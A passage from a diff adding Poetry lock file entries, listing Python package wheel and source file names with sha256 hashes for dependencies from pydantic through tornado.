"pydantic-1.9.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5d93d4e95eacd313d2c765ebe40d49ca9dd2ed90e5b37d0d421c597af830c195"}, + {file = "pydantic-1.9.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1542636a39c4892c4f4fa6270696902acb186a9aaeac6f6cf92ce6ae2e88564b"}, + {file = "pydantic-1.9.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a9af62e9b5b9bc67b2a195ebc2c2662fdf498a822d62f902bf27cccb52dbbf49"}, + {file = "pydantic-1.9.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fe4670cb32ea98ffbf5a1262f14c3e102cccd92b1869df3bb09538158ba90fe6"}, + {file = "pydantic-1.9.1-cp38-cp38-win_amd64.whl", hash = "sha256:9f659a5ee95c8baa2436d392267988fd0f43eb774e5eb8739252e5a7e9cf07e0"}, + {file = "pydantic-1.9.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b83ba3825bc91dfa989d4eed76865e71aea3a6ca1388b59fc801ee04c4d8d0d6"}, + {file = "pydantic-1.9.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1dd8fecbad028cd89d04a46688d2fcc14423e8a196d5b0a5c65105664901f810"}, + {file = "pydantic-1.9.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:02eefd7087268b711a3ff4db528e9916ac9aa18616da7bca69c1871d0b7a091f"}, + {file = "pydantic-1.9.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7eb57ba90929bac0b6cc2af2373893d80ac559adda6933e562dcfb375029acee"}, + {file = "pydantic-1.9.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:4ce9ae9e91f46c344bec3b03d6ee9612802682c1551aaf627ad24045ce090761"}, + {file = "pydantic-1.9.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:72ccb318bf0c9ab97fc04c10c37683d9eea952ed526707fabf9ac5ae59b701fd"}, + {file = "pydantic-1.9.1-cp39-cp39-win_amd64.whl", hash = "sha256:61b6760b08b7c395975d893e0b814a11cf011ebb24f7d869e7118f5a339a82e1"}, + {file = "pydantic-1.9.1-py3-none-any.whl", hash = "sha256:4988c0f13c42bfa9ddd2fe2f569c9d54646ce84adc5de84228cfe83396f3bd58"}, + {file = "pydantic-1.9.1.tar.gz", hash = "sha256:1ed987c3ff29fff7fd8c3ea3a3ea877ad310aae2ef9889a119e22d3f2db0691a"}, +] +pydocstyle = [ + {file = "pydocstyle-6.1.1-py3-none-any.whl", hash = "sha256:6987826d6775056839940041beef5c08cc7e3d71d63149b48e36727f70144dc4"}, + {file = "pydocstyle-6.1.1.tar.gz", hash = "sha256:1d41b7c459ba0ee6c345f2eb9ae827cab14a7533a88c5c6f7e94923f72df92dc"}, +] +pyflakes = [ + {file = "pyflakes-2.4.0-py2.py3-none-any.whl", hash = "sha256:3bb3a3f256f4b7968c9c788781e4ff07dce46bdf12339dcda61053375426ee2e"}, + {file = "pyflakes-2.4.0.tar.gz", hash = "sha256:05a85c2872edf37a4ed30b0cce2f6093e1d0581f8c19d7393122da7e25b2b24c"}, +] +pygithub = [ + {file = "PyGithub-1.55-py3-none-any.whl", hash = "sha256:2caf0054ea079b71e539741ae56c5a95e073b81fa472ce222e81667381b9601b"}, + {file = "PyGithub-1.55.tar.gz", hash = "sha256:1bbfff9372047ff3f21d5cd8e07720f3dbfdaf6462fcaed9d815f528f1ba7283"}, +] +pygments = [ + {file = "Pygments-2.12.0-py3-none-any.whl", hash = "sha256:dc9c10fb40944260f6ed4c688ece0cd2048414940f1cea51b8b226318411c519"}, + {file = "Pygments-2.12.0.tar.gz", hash = "sha256:5eb116118f9612ff1ee89ac96437bb6b49e8f04d8a13b514ba26f620208e26eb"}, +] +pyjwt = [ + {file = "PyJWT-2.4.0-py3-none-any.whl", hash = "sha256:72d1d253f32dbd4f5c88eaf1fdc62f3a19f676ccbadb9dbc5d07e951b2b26daf"}, + {file = "PyJWT-2.4.0.tar.gz", hash = "sha256:d42908208c699b3b973cbeb01a969ba6a96c821eefb1c5bfe4c390c01d67abba"}, +] +pynacl = [ + {file = "PyNaCl-1.5.0-cp36-abi3-macosx_10_10_universal2.whl", hash = "sha256:401002a4aaa07c9414132aaed7f6836ff98f59277a234704ff66878c2ee4a0d1"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:52cb72a79269189d4e0dc537556f4740f7f0a9ec41c1322598799b0bdad4ef92"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a36d4a9dda1f19ce6e03c9a784a2921a4b726b02e1c736600ca9c22029474394"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:0c84947a22519e013607c9be43706dd42513f9e6ae5d39d3613ca1e142fba44d"}, + {file = "PyNaCl-1.5.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:06b8f6fa7f5de8d5d2f7573fe8c863c051225a27b61e6860fd047b1775807858"}, + {file = "PyNaCl-1.5.0-cp36-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:a422368fc821589c228f4c49438a368831cb5bbc0eab5ebe1d7fac9dded6567b"}, + {file = "PyNaCl-1.5.0-cp36-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:61f642bf2378713e2c2e1de73444a3778e5f0a38be6fee0fe532fe30060282ff"}, + {file = "PyNaCl-1.5.0-cp36-abi3-win32.whl", hash = "sha256:e46dae94e34b085175f8abb3b0aaa7da40767865ac82c928eeb9e57e1ea8a543"}, + {file = "PyNaCl-1.5.0-cp36-abi3-win_amd64.whl", hash = "sha256:20f42270d27e1b6a29f54032090b972d97f0a1b0948cc52392041ef7831fee93"}, + {file = "PyNaCl-1.5.0.tar.gz", hash = "sha256:8ac7448f09ab85811607bdd21ec2464495ac8b7c66d146bf545b0f08fb9220ba"}, +] +pyparsing = [ + {file = "pyparsing-3.0.9-py3-none-any.whl", hash = "sha256:5026bae9a10eeaefb61dab2f09052b9f4307d44aee4eda64b309723d8d206bbc"}, + {file = "pyparsing-3.0.9.tar.gz", hash = "sha256:2b020ecf7d21b687f219b71ecad3631f644a47f01403fa1d1036b0c6416d70fb"}, +] +pytest = [ + {file = "pytest-7.1.2-py3-none-any.whl", hash = "sha256:13d0e3ccfc2b6e26be000cb6568c832ba67ba32e719443bfe725814d3c42433c"}, + {file = "pytest-7.1.2.tar.gz", hash = "sha256:a06a0425453864a270bc45e71f783330a7428defb4230fb5e6a731fde06ecd45"}, +] +pytz = [ + {file = "pytz-2022.1-py2.py3-none-any.whl", hash = "sha256:e68985985296d9a66a881eb3193b0906246245294a881e7c8afe623866ac6a5c"}, + {file = "pytz-2022.1.tar.gz", hash = "sha256:1e760e2fe6a8163bc0b3d9a19c4f84342afa0a2affebfaa84b01b978a02ecaa7"}, +] +pyupgrade = [ + {file = "pyupgrade-2.32.1-py2.py3-none-any.whl", hash = "sha256:d874f34870abadd7536c89678f9811076d5df93c13620f90a125355a2d31fa91"}, + {file = "pyupgrade-2.32.1.tar.gz", hash = "sha256:11e2c3e4e2e53a61b2d8852ed154ea5683887b6ac42561622ca8d89c94fd951a"}, +] +pyyaml = [ + {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, + {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, + {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, + {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, + {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, + {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, + {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, + {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, + {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, + {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, + {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, + {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, + {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, + {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, + {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, + {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, + {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, + {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, + {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, + {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, + {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, + {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, +] +reorder-python-imports = [ + {file = "reorder_python_imports-2.8.0-py2.py3-none-any.whl", hash = "sha256:03354608c610a25cba75a352ad86552849dcf3c90849fcb415298efc911a4ecf"}, + {file = "reorder_python_imports-2.8.0.tar.gz", hash = "sha256:435af2a6feb39de3c4b7a415079f85b4b0052d3a7ed9ea7b269b0aff725abdaf"}, +] +requests = [ + {file = "requests-2.28.0-py3-none-any.whl", hash = "sha256:bc7861137fbce630f17b03d3ad02ad0bf978c844f3536d0edda6499dafce2b6f"}, + {file = "requests-2.28.0.tar.gz", hash = "sha256:d568723a7ebd25875d8d1eaf5dfa068cd2fc8194b2e483d7b1f7c81918dbec6b"}, +] +restructuredtext-lint = [ + {file = "restructuredtext_lint-1.4.0.tar.gz", hash = "sha256:1b235c0c922341ab6c530390892eb9e92f90b9b75046063e047cacfb0f050c45"}, +] +rfc3986 = [ + {file = "rfc3986-1.5.0-py2.py3-none-any.whl", hash = "sha256:a86d6e1f5b1dc238b218b012df0aa79409667bb209e58da56d0b94704e712a97"}, + {file = "rfc3986-1.5.0.tar.gz", hash = "sha256:270aaf10d87d0d4e095063c65bf3ddbc6ee3d0b226328ce21e036f946e421835"}, +] +"ruamel.yaml" = [ + {file = "ruamel.yaml-0.17.21-py3-none-any.whl", hash = "sha256:742b35d3d665023981bd6d16b3d24248ce5df75fdb4e2924e93a05c1f8b61ca7"}, + {file = "ruamel.yaml-0.17.21.tar.gz", hash = "sha256:8b7ce697a2f212752a35c1ac414471dc16c424c9573be4926b56ff3f5d23b7af"}, +] +"ruamel.yaml.clib" = [ + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6e7be2c5bcb297f5b82fee9c665eb2eb7001d1050deaba8471842979293a80b0"}, + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:221eca6f35076c6ae472a531afa1c223b9c29377e62936f61bc8e6e8bdc5f9e7"}, + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-win32.whl", hash = "sha256:1070ba9dd7f9370d0513d649420c3b362ac2d687fe78c6e888f5b12bf8bc7bee"}, + {file = "ruamel.yaml.clib-0.2.6-cp310-cp310-win_amd64.whl", hash = "sha256:77df077d32921ad46f34816a9a16e6356d8100374579bc35e15bab5d4e9377de"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-macosx_10_6_intel.whl", hash = "sha256:cfdb9389d888c5b74af297e51ce357b800dd844898af9d4a547ffc143fa56751"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:7b2927e92feb51d830f531de4ccb11b320255ee95e791022555971c466af4527"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-win32.whl", hash = "sha256:ada3f400d9923a190ea8b59c8f60680c4ef8a4b0dfae134d2f2ff68429adfab5"}, + {file = "ruamel.yaml.clib-0.2.6-cp35-cp35m-win_amd64.whl", hash = "sha256:de9c6b8a1ba52919ae919f3ae96abb72b994dd0350226e28f3686cb4f142165c"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:d67f273097c368265a7b81e152e07fb90ed395df6e552b9fa858c6d2c9f42502"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:72a2b8b2ff0a627496aad76f37a652bcef400fd861721744201ef1b45199ab78"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-win32.whl", hash = "sha256:9efef4aab5353387b07f6b22ace0867032b900d8e91674b5d8ea9150db5cae94"}, + {file = "ruamel.yaml.clib-0.2.6-cp36-cp36m-win_amd64.whl", hash = "sha256:846fc8336443106fe23f9b6d6b8c14a53d38cef9a375149d61f99d78782ea468"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0847201b767447fc33b9c235780d3aa90357d20dd6108b92be544427bea197dd"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:78988ed190206672da0f5d50c61afef8f67daa718d614377dcd5e3ed85ab4a99"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-win32.whl", hash = "sha256:a49e0161897901d1ac9c4a79984b8410f450565bbad64dbfcbf76152743a0cdb"}, + {file = "ruamel.yaml.clib-0.2.6-cp37-cp37m-win_amd64.whl", hash = "sha256:bf75d28fa071645c529b5474a550a44686821decebdd00e21127ef1fd566eabe"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a32f8d81ea0c6173ab1b3da956869114cae53ba1e9f72374032e33ba3118c233"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7f7ecb53ae6848f959db6ae93bdff1740e651809780822270eab111500842a84"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-win32.whl", hash = "sha256:89221ec6d6026f8ae859c09b9718799fea22c0e8da8b766b0b2c9a9ba2db326b"}, + {file = "ruamel.yaml.clib-0.2.6-cp38-cp38-win_amd64.whl", hash = "sha256:31ea73e564a7b5fbbe8188ab8b334393e06d997914a4e184975348f204790277"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dc6a613d6c74eef5a14a214d433d06291526145431c3b964f5e16529b1842bed"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:1866cf2c284a03b9524a5cc00daca56d80057c5ce3cdc86a52020f4c720856f0"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-win32.whl", hash = "sha256:3fb9575a5acd13031c57a62cc7823e5d2ff8bc3835ba4d94b921b4e6ee664104"}, + {file = "ruamel.yaml.clib-0.2.6-cp39-cp39-win_amd64.whl", hash = "sha256:825d5fccef6da42f3c8eccd4281af399f21c02b32d98e113dbc631ea6a6ecbc7"}, + {file = "ruamel.yaml.clib-0.2.6.tar.gz", hash = "sha256:4ff604ce439abb20794f05613c374759ce10e3595d1867764dd1ae675b85acbd"}, +] +safety = [ + {file = "safety-1.10.3-py2.py3-none-any.whl", hash = "sha256:5f802ad5df5614f9622d8d71fedec2757099705c2356f862847c58c6dfe13e84"}, + {file = "safety-1.10.3.tar.gz", hash = "sha256:30e394d02a20ac49b7f65292d19d38fa927a8f9582cdfd3ad1adbbc66c641ad5"}, +] +six = [ + {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, + {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, +] +smmap = [ + {file = "smmap-5.0.0-py3-none-any.whl", hash = "sha256:2aba19d6a040e78d8b09de5c57e96207b09ed71d8e55ce0959eeee6c8e190d94"}, + {file = "smmap-5.0.0.tar.gz", hash = "sha256:c840e62059cd3be204b0c9c9f74be2c09d5648eddd4580d9314c3ecde0b30936"}, +] +sniffio = [ + {file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"}, + {file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"}, +] +snowballstemmer = [ + {file = "snowballstemmer-2.2.0-py2.py3-none-any.whl", hash = "sha256:c8e1716e83cc398ae16824e5572ae04e0d9fc2c6b985fb0f900f5f0c96ecba1a"}, + {file = "snowballstemmer-2.2.0.tar.gz", hash = "sha256:09b16deb8547d3412ad7b590689584cd0fe25ec8db3be37788be3810cbf19cb1"}, +] +soupsieve = [ + {file = "soupsieve-2.3.2.post1-py3-none-any.whl", hash = "sha256:3b2503d3c7084a42b1ebd08116e5f81aadfaea95863628c80a3b774a11b7c759"}, + {file = "soupsieve-2.3.2.post1.tar.gz", hash = "sha256:fc53893b3da2c33de295667a0e19f078c14bf86544af307354de5fcf12a3f30d"}, +] +sphinx = [ + {file = "Sphinx-4.3.2-py3-none-any.whl", hash = "sha256:6a11ea5dd0bdb197f9c2abc2e0ce73e01340464feaece525e64036546d24c851"}, + {file = "Sphinx-4.3.2.tar.gz", hash = "sha256:0a8836751a68306b3fe97ecbe44db786f8479c3bf4b80e3a7f5c838657b4698c"}, +] +sphinx-autobuild = [ + {file = "sphinx-autobuild-2021.3.14.tar.gz", hash = "sha256:de1ca3b66e271d2b5b5140c35034c89e47f263f2cd5db302c9217065f7443f05"}, + {file = "sphinx_autobuild-2021.3.14-py3-none-any.whl", hash = "sha256:8fe8cbfdb75db04475232f05187c776f46f6e9e04cacf1e49ce81bdac649ccac"}, +] +sphinx-click = [ + {file = "sphinx-click-3.1.0.tar.gz", hash = "sha256:36dbf271b1d2600fb05bd598ddeed0b6b6acf35beaf8bc9d507ba7716b232b0e"}, + {file = "sphinx_click-3.1.0-py3-none-any.whl", hash = "sha256:8fb0b048a577d346d741782e44d041d7e908922858273d99746f305870116121"}, +] +sphinxcontrib-applehelp = [ + {file = "sphinxcontrib-applehelp-1.0.2.tar.gz", hash = "sha256:a072735ec80e7675e3f432fcae8610ecf509c5f1869d17e2eecff44389cdbc58"}, + {file = "sphinxcontrib_applehelp-1.0.2-py2.py3-none-any.whl", hash = "sha256:806111e5e962be97c29ec4c1e7fe277bfd19e9652fb1a4392105b43e01af885a"}, +] +sphinxcontrib-devhelp = [ + {file = "sphinxcontrib-devhelp-1.0.2.tar.gz", hash = "sha256:ff7f1afa7b9642e7060379360a67e9c41e8f3121f2ce9164266f61b9f4b338e4"}, + {file = "sphinxcontrib_devhelp-1.0.2-py2.py3-none-any.whl", hash = "sha256:8165223f9a335cc1af7ffe1ed31d2871f325254c0423bc0c4c7cd1c1e4734a2e"}, +] +sphinxcontrib-htmlhelp = [ + {file = "sphinxcontrib-htmlhelp-2.0.0.tar.gz", hash = "sha256:f5f8bb2d0d629f398bf47d0d69c07bc13b65f75a81ad9e2f71a63d4b7a2f6db2"}, + {file = "sphinxcontrib_htmlhelp-2.0.0-py2.py3-none-any.whl", hash = "sha256:d412243dfb797ae3ec2b59eca0e52dac12e75a241bf0e4eb861e450d06c6ed07"}, +] +sphinxcontrib-jsmath = [ + {file = "sphinxcontrib-jsmath-1.0.1.tar.gz", hash = "sha256:a9925e4a4587247ed2191a22df5f6970656cb8ca2bd6284309578f2153e0c4b8"}, + {file = "sphinxcontrib_jsmath-1.0.1-py2.py3-none-any.whl", hash = "sha256:2ec2eaebfb78f3f2078e73666b1415417a116cc848b72e5172e596c871103178"}, +] +sphinxcontrib-qthelp = [ + {file = "sphinxcontrib-qthelp-1.0.3.tar.gz", hash = "sha256:4c33767ee058b70dba89a6fc5c1892c0d57a54be67ddd3e7875a18d14cba5a72"}, + {file = "sphinxcontrib_qthelp-1.0.3-py2.py3-none-any.whl", hash = "sha256:bd9fc24bcb748a8d51fd4ecaade681350aa63009a347a8c14e637895444dfab6"}, +] +sphinxcontrib-serializinghtml = [ + {file = "sphinxcontrib-serializinghtml-1.1.5.tar.gz", hash = "sha256:aa5f6de5dfdf809ef505c4895e51ef5c9eac17d0f287933eb49ec495280b6952"}, + {file = "sphinxcontrib_serializinghtml-1.1.5-py2.py3-none-any.whl", hash = "sha256:352a9a00ae864471d3a7ead8d7d79f5fc0b57e8b3f95e9867eb9eb28999b92fd"}, +] +stevedore = [ + {file = "stevedore-3.5.0-py3-none-any.whl", hash = "sha256:a547de73308fd7e90075bb4d301405bebf705292fa90a90fc3bcf9133f58616c"}, + {file = "stevedore-3.5.0.tar.gz", hash = "sha256:f40253887d8712eaa2bb0ea3830374416736dc8ec0e22f5a65092c1174c44335"}, +] +tokenize-rt = [ + {file = "tokenize_rt-4.2.1-py2.py3-none-any.whl", hash = "sha256:08a27fa032a81cf45e8858d0ac706004fcd523e8463415ddf1442be38e204ea8"}, + {file = "tokenize_rt-4.2.1.tar.gz", hash = "sha256:0d4f69026fed520f8a1e0103aa36c406ef4661417f20ca643f913e33531b3b94"}, +] +toml = [ + {file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"}, + {file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"}, +] +tomli = [ + {file = "tomli-2.0.1-py3-none-any.whl", hash = "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc"}, + {file = "tomli-2.0.1.tar.gz", hash = "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f"}, +] +tornado = [ + {file = "tornado-6.1-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:d371e811d6b156d82aa5f9a4e08b58debf97c302a35714f6f45e35139c332e32"}, + {file = "tornado-6.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:0d321a39c36e5f2c4ff12b4ed58d41390460f798422c4504e09eb5678e09998c"}, + {file = "tornado-6.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9de9e5188a782be6b1ce866e8a51bc76a0fbaa0e16613823fc38e4fc2556ad05"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:61b32d06ae8a036a6607805e6720ef00a3c98207038444ba7fd3d169cd998910"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3e63498f680547ed24d2c71e6497f24bca791aca2fe116dbc2bd0ac7f191691b"}, + {file = "tornado-6.1-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:6c77c9937962577a6a76917845d06af6ab9197702a42e1346d8ae2e76b5e3675"}, + {file = "tornado-6.1-cp35-cp35m-win32.whl", hash = "sha256:6286efab1ed6e74b7028327365cf7346b1d777d63ab30e21a0f4d5b275fc17d5"}, + {file = "tornado-6.1-cp35-cp35m-win_amd64.whl", hash = "sha256:fa2ba70284fa42c2a5ecb35e322e68823288a4251f9ba9cc77be04ae15eada68"}, + {file = "tornado-6.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:0a00ff4561e2929a2c37ce706cb8233b7907e0cdc22eab98888aca5dd3775feb"}, + {file = "tornado-6.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:748290bf9112b581c525e6e6d3820621ff020ed95af6f17fedef416b27ed564c"}, + {file = "tornado-6.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e385b637ac3acaae8022e7e47dfa7b83d3620e432e3ecb9a3f7f58f150e50921"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:25ad220258349a12ae87ede08a7b04aca51237721f63b1808d39bdb4b2164558"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:65d98939f1a2e74b58839f8c4dab3b6b3c1ce84972ae712be02845e65391ac7c"}, + {file = "tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:e519d64089b0876c7b467274468709dadf11e41d65f63bba207e04217f47c085"}, + {file = "tornado-6.1-cp36-cp36m-win32.whl", hash = "sha256:b87936fd2c317b6ee08a5741ea06b9d11a6074ef4cc42e031bc6403f82a32575"}, + {file = "tornado-6.1-cp36-cp36m-win_amd64.whl", hash = 